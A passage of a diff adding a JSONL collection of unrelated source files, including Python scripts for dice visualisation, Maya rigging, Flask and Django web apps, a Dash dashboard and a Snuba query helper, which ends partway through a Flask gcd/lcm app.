diff --git "a/4589.jsonl" "b/4589.jsonl" new file mode 100644--- /dev/null +++ "b/4589.jsonl" @@ -0,0 +1,755 @@ +{"seq_id":"71588137","text":"\"\"\"Visualização do lançamento dos dados\"\"\"\nimport pygal\nfrom dice import Dice\n\n# Numero de tentativas\nROLL_NUMBER = 50000\n\n\ndef test_d6():\n \"\"\"Visualização do lançamento dos dados D6\"\"\"\n # Cria um D6\n dice = Dice()\n # Faz alguns lançamentos e armazena os resultados em uma Lista\n results = [dice.roll() for _ in range(ROLL_NUMBER)]\n\n frequencies = [results.count(value) for value in range(1, dice.num_sides + 1)]\n\n # Visualiza os resultados\n hist = pygal.Bar()\n hist.title = \"Resultado de \" + str(ROLL_NUMBER) + \" de tentativas.\"\n hist.x_labels = list(range(1, dice.num_sides + 1))\n hist.x_title = \"Resultado\"\n hist.y_title = \"Frequencia dos resultados\"\n\n hist.add('D6', frequencies)\n hist.render_to_file(\"dice_visual.svg\")\n\n\ndef test_pair_d6():\n \"\"\"Visualização do lançamento dos dados D6 - um para de dados\"\"\"\n # Cria dois D6\n dice_1 = Dice(6)\n dice_2 = Dice(10)\n\n # Faz alguns lançamentos e armazena os resultados em uma Lista\n results = [dice_1.roll() + dice_2.roll() for _ in range(ROLL_NUMBER)]\n\n max_result = dice_1.num_sides + dice_2.num_sides\n\n frequencies = [results.count(value) for value in range(2, max_result + 1)]\n\n # Visualiza os resultados\n hist = pygal.Bar()\n\n hist.title = f\"Resultado de {ROLL_NUMBER} de tentativas de dois dados.\"\n hist.x_labels = list(range(2, max_result + 1))\n hist.x_title = \"Resultado\"\n hist.y_title = \"Frequencia dos resultados\"\n\n hist.add('D6 + D6', frequencies)\n hist.render_to_file(\"dice_visual_pair.svg\")\n\n\ndef main():\n \"\"\"Funçaõ main\"\"\"\n test_pair_d6()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro/dice_visual.py","file_name":"dice_visual.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"217087399","text":"import maya.cmds as cmds\r\nimport CPOutliner as Outliner\r\nimport Rename\r\nimport GenJoints\r\nimport CreateControls\r\nimport ReFK as FK\r\nimport GenBFKV2 as BFK\r\nimport SwitchV2 as SpSwitch\r\nimport ZeroOrients as ZeroOri\r\nimport CenterLocator as CenLoc\r\nimport RandomScatter as Scatter\r\nimport DelHistory\r\nimport ConstrainAll as ConstAll\r\nimport DoubleParent as DPar\r\nimport FreezeTransforms as Freeze\r\n\r\n#Set up window\r\ndef Suite():\r\n winN = \"Suite\"\r\n LoadWin(winN)\r\n \r\n switchTxt = (\"**First: Select all the weight targets.\\n\"\r\n \"Second: Select the object to be constrained.\\n\"\r\n \"Third: Select the control with the 'Follow' attribute.\\n\"\r\n \"Finally: Click the button.\")\r\n \r\n #Set up layout\r\n wrapperLay = cmds.columnLayout(adj=True, cw=600, w=600)\r\n layMain = cmds.gridLayout(nc = 2, cw = 275, cr=True, p=wrapperLay)\r\n \r\n #Outliner\r\n outliner = cmds.button(l=\"Outliner\", p=wrapperLay, c=lambda *args: Outliner.Popup())\r\n \r\n #Parent and Scale Constrain\r\n constAll_Lay = cmds.gridLayout(nc=2, cwh=[275, 100], p=wrapperLay)\r\n constAll_L = cmds.text(l=\"Parent and Scale Constrain:\\t\", p=constAll_Lay)\r\n LoadConstraint(constAll_Lay, ConstAll)\r\n \r\n #Double Parent Constrain\r\n dPar_Lay = cmds.gridLayout(nc=2, cwh=[275, 100], p=wrapperLay)\r\n dPar_L = cmds.text(l=\"Double Parent Constrain:\\t\", p=dPar_Lay)\r\n LoadConstraint(dPar_Lay, DPar)\r\n \r\n #Delete History\r\n delHis = cmds.button(l=\"Delete History\", c=lambda *args: DelHistory.Del(), 
p=layMain)\r\n \r\n #Freeze Transforms\r\n freeze = cmds.button(l=\"Freeze Transforms\", c=lambda *args: Freeze.Freeze(), p=layMain)\r\n \r\n #Renamer\r\n rName_L = cmds.textField(p=layMain)\r\n rName = cmds.button(l=\"Rename\", c=lambda *args: Rename.Rename(cmds.textField(rName_L, q=True, tx=True)), p=layMain)\r\n \r\n #Center Locator\r\n cenLoc = cmds.button(l=\"Create Center Locator\", c=lambda *args: CenLoc.Center(), p=layMain)\r\n \r\n #Create Joints\r\n jnts = cmds.button(l=\"Generate Joint Chain\", c=lambda *args: GenJoints.Generate(), p=layMain)\r\n \r\n #Zero Joint Orient\r\n currentAxis = \"Z\"\r\n jntO = cmds.button(l=\"Zero Joint Orients\", c=lambda *args: ZeroOri.Zero(cmds.ls(sl=True), currentAxis), p=layMain)\r\n LoadRadio(currentAxis, layMain)\r\n \r\n #Create Controls\r\n ctrls = cmds.button(l=\"Generate Controls\", c=lambda *args: CreateControls.Generate(), p=layMain)\r\n \r\n #Basic FK\r\n genFK = cmds.button(l=\"Generate Basic FK\", c=lambda *args: FK.CreateControls(), p=layMain)\r\n \r\n #Broken FK\r\n genBFK = cmds.button(l=\"Generate Broken FK\", c=lambda *args: BFK.CreateControls(), p=layMain)\r\n \r\n #Space Switch\r\n sSwitch = cmds.button(l=\"Switched Parent Constraint\", c=lambda *args: SpSwitch.Switch(), p=wrapperLay)\r\n sSwitch_L = cmds.text(l = switchTxt, al = \"center\", p=wrapperLay)\r\n \r\n #Random placement\r\n rand_L = cmds.text(l=\"RANDOM DUPLICATOR\", al=\"left\", p=wrapperLay)\r\n LoadScatter(wrapperLay)\r\n \r\n cmds.showWindow(winN)\r\n \r\n#Replace window if it already exists\r\ndef LoadWin(winName):\r\n if cmds.window(winName, exists=True):\r\n cmds.deleteUI(winName, wnd=True)\r\n cmds.window(winName)\r\n\r\n#Clean orients - radio button layout\r\ndef LoadRadio(cAx, lay):\r\n aY = \"Y\"\r\n aZ = \"Z\"\r\n \r\n jntO_Grp = cmds.gridLayout(nc=3, cw = .3 * cmds.gridLayout(lay, q=True, cw=True), p=lay)\r\n jntO_L = cmds.text(l=\"Secondary Axis:\", w = .5 * cmds.gridLayout(lay, q=True, cw=True))\r\n jntO_Col = cmds.radioCollection(p=jntO_Grp)\r\n jntO_RadioY = cmds.radioButton(l=aY, cl=jntO_Col, p=jntO_Grp, onc=lambda *args: OrientAxis(cAx, aY))\r\n jntO_RadioZ = cmds.radioButton(l=aZ, cl=jntO_Col, p=jntO_Grp, onc=lambda *args: OrientAxis(cAx, aZ))\r\n\r\n#Clean orients - set selected axis\r\ndef OrientAxis(cax, axis):\r\n cax = axis\r\n\r\n#Random scatter - layout\r\ndef LoadScatter(lay):\r\n scatterLay = cmds.columnLayout(p=lay)\r\n checks = cmds.gridLayout(nc=3, cw=100, p=scatterLay)\r\n moveCheck = cmds.checkBox(l=\"Translate\", v=True, p=checks)\r\n rotCheck = cmds.checkBox(l=\"Rotate\", v=True, p=checks)\r\n scaleCheck = cmds.checkBox(l=\"Scale\", v=True, p=checks)\r\n dups_L = cmds.text(l=\"Number of Duplicates\", p=scatterLay)\r\n dups = cmds.intField(v=10, p=scatterLay)\r\n \r\n limitsLay = cmds.gridLayout(nc=3, cw=100, p=scatterLay)\r\n numX_L = cmds.text(l=\"Max X Translate\", p=limitsLay)\r\n numY_L = cmds.text(l=\"Max Y Translate\", p=limitsLay)\r\n numZ_L = cmds.text(l=\"Max Z Translate\", p=limitsLay)\r\n numX = cmds.floatField(v=10, p=limitsLay)\r\n numY = cmds.floatField(v=10, p=limitsLay)\r\n numZ = cmds.floatField(v=10, p=limitsLay)\r\n \r\n scat = cmds.button(l=\"Scatter\", c=lambda *args: Scatter.Scatter(cmds.intField(dups, q=True, v=True),\r\n cmds.floatField(numX, q=True, v=True), cmds.floatField(numY, q=True, v=True), cmds.floatField(numZ, q=True, v=True),\r\n cmds.checkBox(moveCheck, q=True, v=True), cmds.checkBox(rotCheck, q=True, v=True), cmds.checkBox(scaleCheck, q=True, v=True)),\r\n p=scatterLay)\r\n\r\ndef 
LoadConstraint(lay, script):\r\n constLay = cmds.columnLayout(w=550, p=lay)\r\n single = cmds.button(l=\"Constrain Last Selection to All\", w=275, c=lambda *args: script.Single())\r\n all = cmds.button(l=\"Constrain All to First Selection\", w=275, c=lambda *args: script.All())\r\n each = cmds.button(l=\"Constrain in Pairs: Second to First\", w=275, c=lambda *args: script.Each())\r\n\r\nSuite()","sub_path":"Maya/Rigging/Scripts/Python/Python Suite/Suite.py","file_name":"Suite.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"620969859","text":"import fileinput\n\nsmall_data_set = 200\nlarge_data_set = pow(10, 6)\n\n\ndef main():\n test_case = input()\n\n t = int(test_case)\n if not 1 <= t or not t <= 100:\n print('1 <= T <= 100')\n return\n\n for i in range(t):\n input_n = input()\n n = int(input_n)\n\n sheep_list, index = [], 1\n # counting sheep!\n while True:\n calc_sheep = str(n * index)\n for sheep in calc_sheep:\n if sheep not in sheep_list:\n sheep_list.append(sheep)\n\n # check asleep\n if len(sheep_list) == 10:\n break\n\n # check small data set\n if len(sheep_list) < 5 and index > small_data_set:\n calc_sheep = 'INSOMNIA'\n break\n\n if len(sheep_list) >= 5 and index > large_data_set:\n calc_sheep = 'INSOMNIA'\n break\n\n # increase index\n index += 1\n\n print('Case #{}: {}'.format(i+1, calc_sheep))\n\nmain()\n\n","sub_path":"codes/CodeJamCrawler/16_0_1/teddy.bear/problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436272838","text":"import numpy as np\nfrom flask import Flask, request, jsonify, render_template,redirect,url_for\nimport json\nfrom cust import *\nfrom servercalc import *\nfrom os import path\n\napp = Flask(__name__)\n\n@app.route('/',methods=['GET','POST'])\n\ndef home():\n \n return render_template('index.html')\n\n@app.route('/customerEncryption',methods=['GET','POST'])\ndef customerEncryption():\n if not path.exists('custkeys.json'):\n storeKeys()\n \n pub_key, priv_key = getKeys()\n \n features = [int(x) for x in request.form.values()]\n datafileCustomer=serializeDataCustomer(pub_key,features)\n with open('data.json', 'w') as file: \n json.dump(datafileCustomer, file)\n \n keys=[pub_key,priv_key]\n return render_template('cust.html',keys=keys)\n\n@app.route('/company',methods=['GET','POST'])\ndef company():\n datafileCompany=serializeDataCompany()\n with open('answer.json', 'w') as file:\n json.dump(datafileCompany,file)\n\t\t\n \n return render_template('company.html',datafileCompany=datafileCompany)\n \n #return redirect(url_for('result'))\n\n@app.route('/result',methods=['GET','POST'])\ndef result():\n answer_file=loadAnswer()\n answer_key=paillier.PaillierPublicKey(n=int(answer_file['pubkey']['n']))\n answer = paillier.EncryptedNumber(answer_key, int(answer_file['values'][0]), int(answer_file['values'][1]))\n pub_key, priv_key = getKeys()\n if (answer_key==pub_key):\n final_result=priv_key.decrypt(answer)\n \t\n \n return render_template('result.html',final_result=final_result)\n\n \nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"371730583","text":"import json\n\nfrom django.contrib.auth import get_user_model\nfrom 
django.core.urlresolvers import reverse\nfrom django.test.client import Client\n\nfrom elastimorphic.tests.base import BaseIndexableTestCase\n\nfrom bulbs.promotion.models import ContentList, ContentListHistory\n\nfrom tests.testcontent.models import TestContentObj\n\n\nclass PromotionApiTestCase(BaseIndexableTestCase):\n\n def test_content_list_api(self):\n User = get_user_model()\n admin = User.objects.create_user(\"admin\", \"tech@theonion.com\", \"secret\")\n admin.is_staff = True\n admin.save()\n client = Client()\n client.login(username=\"admin\", password=\"secret\")\n\n content_list = ContentList.objects.create(name=\"homepage\")\n data = []\n for i in range(10):\n content = TestContentObj.objects.create(\n title=\"Content test #{}\".format(i),\n )\n data.append({\"id\": content.pk})\n\n content_list.data = data\n content_list.save()\n\n endpoint = reverse(\"contentlist-detail\", kwargs={\"pk\": content_list.pk})\n response = client.get(endpoint)\n self.assertEqual(response.status_code, 200)\n for index, content in enumerate(response.data[\"content\"]):\n self.assertEqual(content[\"title\"], \"Content test #{}\".format(index))\n\n new_data = response.data\n # This sucks, but it just reverses the list\n new_data[\"content\"] = [{\"id\": content[\"id\"]} for content in response.data[\"content\"]][::-1]\n\n self.assertEqual(ContentListHistory.objects.count(), 0)\n\n response = client.put(endpoint, json.dumps(new_data), content_type=\"application/json\")\n self.assertEqual(response.status_code, 200)\n for index, content in enumerate(response.data[\"content\"]):\n self.assertEqual(content[\"title\"], \"Content test #{}\".format(9 - index))\n\n self.assertEqual(ContentListHistory.objects.count(), 1)\n content_list = ContentList.objects.get(name=content_list.name)\n self.assertEqual(ContentListHistory.objects.get().data, content_list.data)\n","sub_path":"tests/promotion/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"432404774","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport dash\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\n\nfrom app import app, data, categoryColumns\nfrom components.data_viewer import DataViewer\nfrom components.configuration_panel import ConfigurationPanel\nfrom components.pie_chart_component import PieChartComponent\nfrom components.bar_chart_component import BarChartComponent\nfrom components.years_of_code_component import YearsOfCodeComponent\nfrom dash.dependencies import Input, Output\n\n\napp.layout = html.Div(\n [\n dcc.Store(id='config-store', data={\n 'selectedCountries': [],\n 'selectedAgeRange': [],\n 'selectedGenders': []\n }),\n html.Div(\n [\n html.H1('StackOverflow Survey 2019'),\n html.P('Authors: Bartłomiej Mroziński, Piotr Pawlik',\n className='authors')\n ],\n className='app-header'\n ),\n html.Div(\n [\n ConfigurationPanel.render(),\n YearsOfCodeComponent.render(),\n ],\n className='first-section'\n ),\n html.Div(\n [\n PieChartComponent.render(\n 'OpSys', categoryColumns, 'OpSys'),\n PieChartComponent.render(\n 'DevEnviron', categoryColumns, 'DevEnviron'),\n PieChartComponent.render(\n 'Containers', categoryColumns, 'Containers')\n ],\n className='piecharts-container'\n ),\n dcc.Tabs(id='tabs-example', value='language', children=[\n dcc.Tab(\n BarChartComponent.render(\n ['LanguageWorkedWith', 'LanguageDesireNextYear']),\n label='Language',\n 
value='language'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['DatabaseWorkedWith', 'DatabaseDesireNextYear']),\n label='Database',\n value='database'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['PlatformWorkedWith', 'PlatformDesireNextYear']),\n label='Platform',\n value='platform'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['WebFrameWorkedWith', 'WebFrameDesireNextYear']),\n label='Web Framework',\n value='webframework'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['MiscTechWorkedWith', 'MiscTechDesireNextYear']),\n label='Misc Tech',\n value='misctech'\n ),\n ]),\n DataViewer.render()\n ],\n className='app-container',\n)\n\nif __name__ == '__main__':\n appPort = os.environ.get('PORT', 8050)\n app.run_server(host='0.0.0.0', port=appPort, debug=False)\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70921836","text":"def raw_query(start, end, groupby=None, conditions=None, filter_keys=None, aggregations=None, rollup=None, arrayjoin=None, limit=None, offset=None, orderby=None, having=None, referrer=None, is_grouprelease=False, selected_columns=None, totals=None, limitby=None, turbo=False):\n '\\n Sends a query to snuba.\\n\\n `conditions`: A list of (column, operator, literal) conditions to be passed\\n to the query. Conditions that we know will not have to be translated should\\n be passed this way (eg tag[foo] = bar).\\n\\n `filter_keys`: A dictionary of {col: [key, ...]} that will be converted\\n into \"col IN (key, ...)\" conditions. These are used to restrict the query to\\n known sets of project/issue/environment/release etc. Appropriate\\n translations (eg. from environment model ID to environment name) are\\n performed on the query, and the inverse translation performed on the\\n result. 
The project_id(s) to restrict the query to will also be\\n automatically inferred from these keys.\\n\\n `aggregations` a list of (aggregation_function, column, alias) tuples to be\\n passed to the query.\\n '\n start = naiveify_datetime(start)\n end = naiveify_datetime(end)\n groupby = (groupby or [])\n conditions = (conditions or [])\n having = (having or [])\n aggregations = (aggregations or [])\n filter_keys = (filter_keys or {\n \n })\n selected_columns = (selected_columns or [])\n with timer('get_snuba_map'):\n (forward, reverse) = get_snuba_translators(filter_keys, is_grouprelease=is_grouprelease)\n if ('project_id' in filter_keys):\n project_ids = list(set(filter_keys['project_id']))\n elif filter_keys:\n with timer('get_related_project_ids'):\n ids = [get_related_project_ids(k, filter_keys[k]) for k in filter_keys]\n project_ids = list(set.union(*map(set, ids)))\n else:\n project_ids = []\n for (col, keys) in six.iteritems(forward(filter_keys.copy())):\n if keys:\n if ((len(keys) == 1) and (None in keys)):\n conditions.append((col, 'IS NULL', None))\n else:\n conditions.append((col, 'IN', keys))\n if (not project_ids):\n raise UnqualifiedQueryError('No project_id filter, or none could be inferred from other filters.')\n project = Project.objects.get(pk=project_ids[0])\n retention = quotas.get_event_retention(organization=Organization(project.organization_id))\n if retention:\n start = max(start, (datetime.utcnow() - timedelta(days=retention)))\n if (start > end):\n raise QueryOutsideRetentionError\n if (referrer != 'tsdb'):\n (start, end) = shrink_time_window(filter_keys.get('issue'), start, end)\n if (start > end):\n raise QueryOutsideGroupActivityError\n request = {k: v for (k, v) in six.iteritems({\n 'from_date': start.isoformat(),\n 'to_date': end.isoformat(),\n 'conditions': conditions,\n 'having': having,\n 'groupby': groupby,\n 'totals': totals,\n 'project': project_ids,\n 'aggregations': aggregations,\n 'granularity': rollup,\n 'arrayjoin': arrayjoin,\n 'limit': limit,\n 'offset': offset,\n 'limitby': limitby,\n 'orderby': orderby,\n 'selected_columns': selected_columns,\n 'turbo': turbo,\n }) if (v is not None)}\n request.update(OVERRIDE_OPTIONS)\n headers = {\n \n }\n if referrer:\n headers['referer'] = referrer\n try:\n with timer('snuba_query'):\n response = _snuba_pool.urlopen('POST', '/query', body=json.dumps(request), headers=headers)\n except urllib3.exceptions.HTTPError as err:\n raise SnubaError(err)\n try:\n body = json.loads(response.data)\n except ValueError:\n raise UnexpectedResponseError('Could not decode JSON response: {}'.format(response.data))\n if (response.status != 200):\n if body.get('error'):\n error = body['error']\n if (response.status == 429):\n raise RateLimitExceeded(error['message'])\n elif (error['type'] == 'schema'):\n raise SchemaValidationError(error['message'])\n elif (error['type'] == 'clickhouse'):\n if (error['code'] == 43):\n raise QueryIllegalTypeOfArgument(error['message'])\n elif (error['code'] == 241):\n raise QueryMemoryLimitExceeded(error['message'])\n else:\n raise QueryExecutionError(error['message'])\n else:\n raise SnubaError(error['message'])\n else:\n raise SnubaError('HTTP {}'.format(response.status))\n body['data'] = [reverse(d) for d in body['data']]\n return body","sub_path":"Data 
Set/bug-fixing-5/96d7365c416cf65c5d7a5d30fe5553d8d2edb7dd--fix.py","file_name":"96d7365c416cf65c5d7a5d30fe5553d8d2edb7dd--fix.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"651118321","text":"from __future__ import print_function\nimport math as m\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial import cKDTree\n\n\ndef match_etaphi(ref_etaphi, trigger_etaphi, trigger_pt, deltaR=0.2, return_positional=False):\n '''Match objects within a given DeltaR.\n\n If return_positional = False\n Returns the panda index of the best match (highest-pt)\n and of all the matches\n If return_positional = True\n Returns the position of the best match (highest-pt)\n and of all the matches in the input trigger_etaphi and trigger_pt arrays.\n '''\n # print (\"INPUT ref_etaphi\")\n # print (ref_etaphi)\n # print (\"INPUT trigger_etaphi\")\n # print (trigger_etaphi)\n # print (\"INPUT trigger_pt\")\n # print (trigger_pt)\n kdtree = cKDTree(trigger_etaphi)\n best_match_indices = {}\n all_matches_indices = {}\n\n # for iref,(eta,phi) in enumerate(ref_etaphi):\n for index, row in ref_etaphi.iterrows():\n gen_eta, gen_phi = row.values\n matched = kdtree.query_ball_point([gen_eta, gen_phi], deltaR)\n # not this in an integer of the index of the array not the index in the pandas meaning: hence to beused with iloc\n # Handle the -pi pi transition\n matched_sym = kdtree.query_ball_point([gen_eta, gen_phi-np.sign(gen_phi)*2.*m.pi], deltaR)\n matched = np.unique(np.concatenate((matched, matched_sym))).astype(int)\n # print ('matched iloc:')\n # print (matched)\n # print type(matched)\n # print trigger_pt[matched]\n # print trigger_etaphi.iloc[matched]\n # Choose the match with highest pT\n if (len(matched) != 0):\n # print (trigger_pt.iloc[matched])\n # print (trigger_pt.iloc[matched].idxmax())\n # print (np.argmax(trigger_pt.iloc[matched]))\n\n if return_positional:\n best_match_indices[index] = matched[np.argmax(trigger_pt.iloc[matched])]\n all_matches_indices[index] = matched\n else:\n best_match = trigger_pt.iloc[matched].idxmax()\n best_match_indices[index] = best_match\n all_matches_indices[index] = trigger_pt.iloc[matched].index.values\n\n # print ('best match:')\n # print (best_match)\n # best_match_indices[index] = best_match\n # all_matches_indices[index] = trigger_pt.iloc[matched].index.values\n # print (trigger_pt.iloc[matched].index.values)\n\n # print best_match_indices\n # print all_matches_indices\n return best_match_indices, all_matches_indices\n\n\ndef debugPrintOut(level, name, toCount, toPrint, max_lines=-1):\n if level == 0:\n return\n if level >= 3:\n print(('# {}: {}'.format(name, len(toCount))))\n if level >= 4 and not toPrint.empty:\n print(max_lines)\n if max_lines != -1:\n with pd.option_context('display.max_rows', max_lines, 'display.max_columns', None,):\n print(toPrint)\n else:\n print(toPrint)\n","sub_path":"python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"134739873","text":"from random import randint\r\n\r\n# Constants\r\nproduct_name = 'LH-ABC'\r\nversion_short = '3.3.0.2'\r\nversion = version_short + ' (' + product_name + ' - BitTornado 0.3.18)'\r\nuser_agent = product_name + '/' + version_short\r\nauthor = \"Roee Shlomo\"\r\nhome_page = \"http://code.google.com/p/lh-abc\"\r\nreport_email = 'lh.abc.support@gmail.com'\r\nbuild_number = 
228\r\n\r\n# PeerID\r\nmapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'\r\nprefix = \"-\" + product_name[:2] + ''.join(version_short.split('.')) + \"-\"\r\nprefix = prefix.upper()\r\n\r\ndef createPeerID():\r\n peerid = prefix\r\n while len(peerid) < 20:\r\n peerid += mapbase64[randint(0, 61)]\r\n return peerid\r\n","sub_path":"BitTornado/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"432251499","text":"import datetime\n\nfrom django.utils import timezone\n\nfrom functional_tests import graphql_utils\n\nPOST_QUERY = \"\"\"\nquery GetPostBySlug($slug: String!) {\n post(slug: $slug) {\n author {\n id\n name\n }\n content\n published\n rendered\n slug\n title\n updated\n }\n}\n\"\"\"\n\n\ndef test_get_post(api_client, post_factory):\n \"\"\"\n Users should be able to query for a published post by its slug.\n \"\"\"\n post = post_factory(\n content=\"A post that should be fetch-able.\", title=\"Published Post\"\n )\n expected = {\n \"author\": {\"id\": str(post.author.id), \"name\": post.author.name},\n \"content\": post.content,\n \"published\": post.published.isoformat(),\n \"rendered\": post.rendered,\n \"slug\": post.slug,\n \"title\": post.title,\n \"updated\": post.updated.isoformat(),\n }\n\n response = api_client.query(POST_QUERY, variables={\"slug\": post.slug})\n response.raise_for_status()\n\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"post\": expected}}\n\n\ndef test_get_post_unpublished(api_client, post_factory):\n \"\"\"\n Attempting to fetch an unpublished post should behave the same as if\n the post didn't exist.\n \"\"\"\n now = timezone.now()\n later = now + datetime.timedelta(days=1)\n post = post_factory(published=later)\n\n response = api_client.query(POST_QUERY, variables={\"slug\": post.slug})\n response.raise_for_status()\n\n assert response.status_code == 200\n graphql_utils.assert_has_error(\n response.json(), \"Post matching query does not exist.\", path=[\"post\"]\n )\n","sub_path":"darksite/functional_tests/blog/test_get_post.py","file_name":"test_get_post.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"488108831","text":"# coding=utf-8\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic.base import TemplateView\n\nfrom dialogs.forms import MessageForm\nfrom dialogs.models import Dialog\n\n\nclass DialogView(TemplateView):\n template_name = 'dialogs/dialog.html'\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n self.opponent = None\n self.dialog = None\n self.form = None\n if 'user_id' in kwargs:\n self.opponent = get_object_or_404(get_user_model(), pk=kwargs['user_id'])\n self.dialog = Dialog.objects.get_or_create(request.user, self.opponent)\n if not self.dialog:\n raise Http404\n self.form = MessageForm(request.POST or None)\n return super(DialogView, self).dispatch(request, *args, **kwargs)\n\n def get_dialogs(self):\n qs = Dialog.objects.for_user(self.request.user).select_related('user1', 'user2').filter(\n 
last_message__isnull=False\n ).order_by('-last_message__created')\n paginator = Paginator(qs, 2)\n page = self.request.GET.get('dialogs-page')\n try:\n items = paginator.page(page)\n except PageNotAnInteger:\n items = paginator.page(1)\n except EmptyPage:\n items = paginator.page(paginator.num_pages)\n return items\n\n def get_messages(self):\n if not self.dialog:\n return\n paginator = Paginator(self.dialog.messages.select_related('sender'), 2)\n page = self.request.GET.get('messages-page')\n try:\n items = paginator.page(page)\n except PageNotAnInteger:\n items = paginator.page(1)\n except EmptyPage:\n items = paginator.page(paginator.num_pages)\n return items\n\n def get_context_data(self, **kwargs):\n context = super(DialogView, self).get_context_data(**kwargs)\n context['dialogs'] = self.get_dialogs()\n context['opponent'] = self.opponent\n context['dialog_messages'] = self.get_messages()\n context['form'] = self.form\n return context\n\n def post(self, request, *args, **kwargs):\n if self.form and self.form.is_valid():\n message = self.form.save(commit=False)\n message.dialog = self.dialog\n message.sender = request.user\n message.save()\n return redirect(request.path)\n return self.get(request, *args, **kwargs)\n","sub_path":"dialogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593101394","text":"from model.user import User\n\n\ndef test_add_user(app, db, data_users, check_ui):\n contact = data_users\n # формирование списка контактов\n old_user_list = db.get_user_list()\n # добавление контакта\n app.user.add(contact)\n # формирование нового списка пользователей\n new_user_list = db.get_user_list()\n # проверка, что новый список длиннее старого на 1\n assert len(old_user_list) + 1 == len(new_user_list)\n # добавление контакта в старый список\n old_user_list.append(contact)\n # проверка совпадения контактов из старого и нового списков\n assert sorted(old_user_list, key=User.id_or_max) == sorted(new_user_list, key=User.id_or_max)\n if check_ui:\n assert sorted(new_user_list, key=User.id_or_max) == sorted(app.user.get_user_list(), key=User.id_or_max)","sub_path":"test/test_add_user.py","file_name":"test_add_user.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"346017640","text":"from cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session, url_for\nfrom flask_session import Session\nfrom passlib.apps import custom_app_context as pwd_context\nfrom tempfile import gettempdir\nfrom Euclid import gcd, lcm\nfrom polynomials1 import polynomial\n\nfrom helpers import *\n\n# configure application\napp = Flask(__name__)\n\n# ensure responses aren't cached\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n# configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = gettempdir()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\n@app.route(\"/start\")\ndef index():\n return render_template(\"start.html\")\n \n\n@app.route(\"/euclid\", methods=[\"GET\", \"POST\"])\ndef euclid():\n \"\"\"Compute the gcd and lcm of two 
numbers\"\"\"\n \n # render the template \"euclid\"\n if request.method == \"GET\":\n return render_template(\"euclid.html\")\n \n if request.method == \"POST\":\n \n # if the first number is not provided, return apology\n if not request.form.get(\"first\"):\n return apology(\"must provide a number\")\n \n # if the second number not provided, return apology\n if not request.form.get(\"second\"):\n return apology(\"must provide a number\")\n\n # extract the numbers from the request form\n first = int(request.form.get(\"first\")) \n second = int(request.form.get(\"second\"))\n\n # if numbers less than 0, return apology\n if first <= 0:\n return apology(\"must provide a positive integer\")\n \n if second <= 0:\n return apology(\"must provide a positive integer\")\n \n # calculate gcd and lcm\n divisor = gcd(first, second)\n multiplicity = lcm(first, second)\n \n # render a template that will show the results\n return render_template(\"gcd_lcm.html\", x = first, y = second, gcd = divisor, lcm = multiplicity)\n \n@app.route(\"/polynomials\", methods=[\"GET\", \"POST\"])\ndef polynomials():\n \"\"\"Type the degrees of the dividend and the divisor\"\"\"\n \n # render the template \"polynomial\"\n if request.method == \"GET\":\n return render_template(\"polynomials.html\")\n \n if request.method == \"POST\":\n \n # if the first number is not provided, return apology\n if not request.form.get(\"first\"):\n return apology(\"must provide the degree of the dividend\")\n \n # extract the degree of the dividend from the request form\n first = int(request.form.get(\"first\"))\n \n # if the second number not 